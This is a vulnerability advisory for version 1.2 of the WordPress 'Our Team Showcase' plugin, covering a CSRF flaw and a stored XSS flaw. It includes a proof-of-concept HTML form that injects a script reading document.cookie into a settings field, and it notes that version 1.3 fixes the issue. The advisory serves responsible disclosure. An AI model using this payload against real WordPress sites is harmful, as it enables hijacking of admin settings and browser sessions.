Title: WordPress 'Our Team Showcase' plugin - CSRF/XSS Version: 1.2 Author: Morten Nørtoft, Kenneth Jepsen, Mikkel Vej Date: 2014/12/12 Download: https://wordpress.org/plugins/our-team-enhanced/ Notified WordPress: 2014/11/27 ---------------------------------------------------------------- ## Description: ---------------------------------------------------------------- This plugin allows you to add, edit, search and display your team members on any page, or in a widget quickly and easily. It comes with a couple of different styles to choose from. Re-order team members with a simple drag & drop. output your team members anywhere with the shortcode [our-team] Boosts SEO with schema.org markup ## CSRF: ---------------------------------------------------------------- It is possible to change the plugins admin settings by tricking a logged in admin to visit a crafted page. ## Stored XSS: ---------------------------------------------------------------- Some settings data from the admin page is stored unsanitized and shown on the plugin's admin page. This allows an attacker to perform XSS through the settings fields. PoC: Log in as admin and then submit the following form. <form method="POST" action="http://[DOMAIN]wp-admin/edit.php?post_type=team_member&page=sc_team_settings" enctype="multipart/form-data"> <input type="text" name="sc_our_team_template" value="grid"><br /> <input type="text" name="sc_our_team_social" value="yes"><br /> <text>sc_our_team_member_count: </text> <input type="text" name="sc_our_team_member_count" value="-1"><script>alert(document.cookie);</script>"><br /> <input type="text" name="sc_our_team_save" value="Update"><br /> <input type="submit"> </form> ## Solution ---------------------------------------------------------------- Update to version 1.3.